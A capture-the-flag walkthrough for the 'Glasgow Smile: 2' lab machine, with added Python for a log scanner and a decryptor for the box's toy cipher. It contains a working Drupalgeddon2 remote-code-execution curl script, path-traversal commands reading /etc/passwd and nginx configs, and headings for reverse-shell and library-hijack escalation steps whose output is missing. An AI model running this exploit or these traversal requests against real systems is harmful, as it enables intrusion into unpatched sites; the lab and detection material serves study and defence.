Glasgow Smile: 2 Walkthrough

Reference: Glasgow Smile: 2
Target IP: 192.168.1.12

Scan with nmap:

Enumerate files with the txt extension using gobuster:

http://192.168.1.12/todo.txt reveals there’s a bash script:

Enumerate files with the sh extension using gobuster:

http://192.168.1.12/joke.sh reveals http://192.168.1.12/Glasgow---Smile2/:

Request http://192.168.1.12/Glasgow---Smile2/:

Enumerate with droopescan:

The exploit is derived from Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - ‘Drupalgeddon2’ Remote Code Execution (PoC).

44448_fix.sh

#!/bin/bash

usage() {
    cat <<HERE
usage: $0 baseurl cmd

e.g. $0 http://127.0.0.1 "id"
HERE
}

# Print usage and exit when the argument count is wrong.
[[ $# -ne 2 ]] &&
    usage &&
    exit 1

baseurl="$1"
cmd="$2"

curl -s -XPOST "${baseurl}/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax" \
    -d "form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=${cmd}"

Reverse shell:

/etc/passwd:

Enumerate local ports:

SSH remote port forward:

Request http://127.0.0.1:18080:

Local file inclusion http://127.0.0.1:18080/?page=../../../../../../../etc/passwd:

Enumerate /etc/nginx/nginx.conf.

curl -s "http://127.0.0.1:18080/?page=../../../../../../../etc/nginx/nginx.conf" | egrep -v "^$|^#"

Enumerate /etc/nginx/sites-enabled/default.conf.

curl -s "http://127.0.0.1:18080/?page=../../../../../../../etc/nginx/sites-enabled/default.conf" | egrep -v "^$|^\s*#"
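The two request shapes seen so far on this box, the Drupal AJAX form request used by the 44448 script and the `?page=../../` traversal against the nginx-fronted application, both leave a distinctive trace in web-server access logs. The following Python scanner is an added example (not part of the original walkthrough or of any tool mentioned here) that parses combined-format log lines, URL-decodes parameter values repeatedly so double-encoded traversal does not slip through, and flags both patterns. The log lines are constructed for the example; the source IPs, timestamps and paths are made up.

```python
import re
from urllib.parse import parse_qs, unquote

# Constructed sample access-log lines (combined format); not taken from the page.
SAMPLE_LOG = """\
192.168.1.5 - - [10/Oct/2020:12:00:01 +0000] "GET /?page=../../../../../../../etc/passwd HTTP/1.1" 200 1234 "-" "curl/7.68.0"
192.168.1.5 - - [10/Oct/2020:12:00:02 +0000] "GET /?page=..%2F..%2F..%2Fetc%2Fnginx%2Fnginx.conf HTTP/1.1" 200 2048 "-" "curl/7.68.0"
192.168.1.5 - - [10/Oct/2020:12:00:03 +0000] "GET /?page=%252e%252e%2f%252e%252e%2fetc%2fpasswd HTTP/1.1" 200 1234 "-" "curl/7.68.0"
192.168.1.5 - - [10/Oct/2020:12:00:04 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 512 "-" "curl/7.68.0"
192.168.1.9 - - [10/Oct/2020:12:00:05 +0000] "GET /?page=about HTTP/1.1" 200 800 "-" "Mozilla/5.0"
192.168.1.9 - - [10/Oct/2020:12:00:06 +0000] "GET /user/register HTTP/1.1" 200 3000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp, method, request target and status from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so %2e%2e%2f and double-encoded forms collapse to plain text."""
    for _ in range(rounds):
        new = unquote(value)
        if new == value:
            break
        value = new
    return value


def classify(line):
    """Return a record for one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path, _, query = m.group("target").partition("?")
    params = parse_qs(query, keep_blank_values=True)  # decodes one layer of %XX
    findings = []

    # Path traversal: any parameter value containing "../" once fully decoded
    # (backslashes are normalised so "..\" is caught as well).
    for name, values in params.items():
        for v in values:
            if "../" in decode_fully(v).replace("\\", "/"):
                findings.append(f"traversal in parameter {name!r}")

    # Drupal Form API render-array request: element_parents on /user/register
    # is the shape the Drupalgeddon2 PoC uses, not something browsers send.
    if "element_parents" in params and decode_fully(path).endswith("/user/register"):
        findings.append("drupal ajax render-array request")

    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "method": m.group("method"),
        "path": path,
        "status": int(m.group("status")),
        "findings": findings,
    }


def scan(log_text):
    """Return only the records that carry at least one finding."""
    hits = []
    for line in log_text.splitlines():
        rec = classify(line)
        if rec and rec["findings"]:
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(rec["ip"], rec["method"], rec["path"], rec["findings"])
```

Run against a real log with `scan(open("/var/log/nginx/access.log").read())`; the decode loop is what catches the third sample line, which a single `unquote` would miss.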

http://192.168.1.12/helpmeriddlernewapplication returns 404:

Request /var/www/myplace/hereis/threatened/index.php with LFI again:

The riddle’s answer is here, which leads to user riddler’s password:

/home/riddler/user.txt:

Format and try to restore /home/riddler/theworldmustbeburned/burn:

burn.php

<?php
function grdl($file){
    $fp = fopen($file,'r') or die();

    $count = 0;
    while(!feof($fp)) {
        $t = fgets($fp);
        $count++;
    }
    rewind($fp);
    $i=0;
    $random=rand(0,$count);
    while((!feof($fp))&&($i<=$random)) {
        if($result=fgets($fp, 1048576)) {
            $i++;
        }
    }

    fclose($fp) or die();
    return $result;
}

function gws($key){
    $array_key = str_split($key);
    $result = 0;
    foreach($array_key as $ele){
        $result += ord($ele);
    }
    return $result;
}

function encrypt($key1,$key2,$input){
    $is_true = true;
    $gws_key1 = gws($key1); // 2154
    $gws_key2 = gws($key2); // 2190
    $array_input = str_split($input);
    $result = "";
    foreach($array_input as $ele) {
        $is_true = !$is_true; // $is_true 0 1
        $p = $gws_key1; // $p k1 k2
        if($is_true) {
            $p = $gws_key2;
        }

        $result .= ord($ele) + $p;
        if($is_true) { // $result F A
            $result .= "A";
        } else {
            $result .= "F";
        }
    }
    return $result;
}

$file = "jokerinthepack";
$input = readline("Enter the string to encrypt: ");
$key1 = trim(grdl($file));
$key2 = trim(grdl($file));
print "\n";
print "Your keys:";
print "\n";
print "Key 1: ".$key1;
print "\n";
print "Key 2: ".$key2;
print "\n";
$encrypted = trim(encrypt($key1,$key2,$input));
print "Encrypted string:".$encrypted."\n\n\n";

?>

The encrypted string in /home/riddler/theworldmustbeburned/message.txt is a sequence of numbers delimited by F and A.

Take the first token, 2188F, as an example.

ord($ele) = 2188 - 2154 = 34 which is 4.

Here’s my decrypt script (which cannot be used directly):

decrypt.py

# Expects message.txt reformatted so that each <number><F|A> token sits on its own line.
with open("./message.restore.txt") as fp:
    for line in fp:
        l = line.strip()
        if not l:
            continue
        num = int(l[:len(l)-1])
        # F tokens were shifted by gws(key1), A tokens by gws(key2)
        if l[-1] == "F":
            num -= 2154
        if l[-1] == "A":
            num -= 2190

        print(chr(num))
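The scheme in burn.php collapses each key to the sum of its byte values, so the two keys only ever contribute two integers (2154 and 2190 on this box), every character is shifted by one of them in alternation, and the F/A suffix records which one was used. That makes the output a two-value shift cipher whose token boundaries are self-describing, which is why it can be undone without the key words. The Python below is an added example, not code from the original post or from the box's own files: it re-implements gws() and encrypt() and adds a decrypt() that works on the whole concatenated token string rather than one token per line. The key names and plaintexts used in the test are made up.

```python
import re


def gws(key):
    """Sum of the byte values of the key, exactly as burn.php's gws() computes it."""
    return sum(ord(c) for c in key)


def encrypt(key1, key2, plaintext):
    """Re-implementation of burn.php's encrypt().

    The flag starts true and is flipped before use, so the first character is
    shifted by gws(key1) and tagged F, the second by gws(key2) and tagged A, etc.
    """
    s1, s2 = gws(key1), gws(key2)
    is_true = True
    out = []
    for ch in plaintext:
        is_true = not is_true
        p = s2 if is_true else s1
        out.append(str(ord(ch) + p) + ("A" if is_true else "F"))
    return "".join(out)


TOKEN_RE = re.compile(r"(\d+)([FA])")


def decrypt(s1, s2, blob):
    """Invert encrypt() given only the two key sums.

    F tokens were shifted by s1 (key 1), A tokens by s2 (key 2). The tags must
    strictly alternate starting with F, and every recovered value must be a byte;
    anything else means the blob is corrupt or the sums are wrong.
    """
    tokens = TOKEN_RE.findall(blob)
    if "".join(num + tag for num, tag in tokens) != blob:
        raise ValueError("blob is not a sequence of <number><F|A> tokens")
    chars = []
    for i, (num, tag) in enumerate(tokens):
        expected = "F" if i % 2 == 0 else "A"
        if tag != expected:
            raise ValueError(f"token {i} tagged {tag}, expected {expected}")
        code = int(num) - (s1 if tag == "F" else s2)
        if not 0 <= code < 256:
            raise ValueError(f"token {i} decodes outside the byte range: {code}")
        chars.append(chr(code))
    return "".join(chars)


if __name__ == "__main__":
    # Constructed keys and message; the real ones come from the box's jokerinthepack list.
    k1, k2 = "examplekeyone", "examplekeytwo"
    blob = encrypt(k1, k2, "the world must be burned")
    print(blob)
    print(decrypt(gws(k1), gws(k2), blob))
```

With the sums the walkthrough recovered, `decrypt(2154, 2190, open("message.txt").read().strip())` yields the password in one call; the parity check is what tells you the token split is right before any character is trusted.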

Decrypted message is bane’s password:

/home/bane/user2.txt:

Escalate from user bane to user carnage:

/home/carnage/user3.txt:

pspy64:

/opt/get_out/help.txt:

Replace zipfile library with my reverse shell:

Reverse shell as user venom:

/home/venom/user4.txt:

Add my public key to /home/venom/.ssh/authorized_keys:

strings /home/venom/Ladies_and_Gentlmen/Gotham/gothamwillburn4:

Replace cat to escalate from user venom to user root:

/root/root.txt:


  • 44448_fix.sh

This exploit cannot read files properly:

  • /var/www/html/Glasgow---Smile2/sites/default/settings.php:
  • /var/www/html/smileyface.pcap:
  • http://192.168.1.12/GlasgowphpmyadminSmile2:
  • /opt/get_out/moonlight.py:
  • /root/task.sh: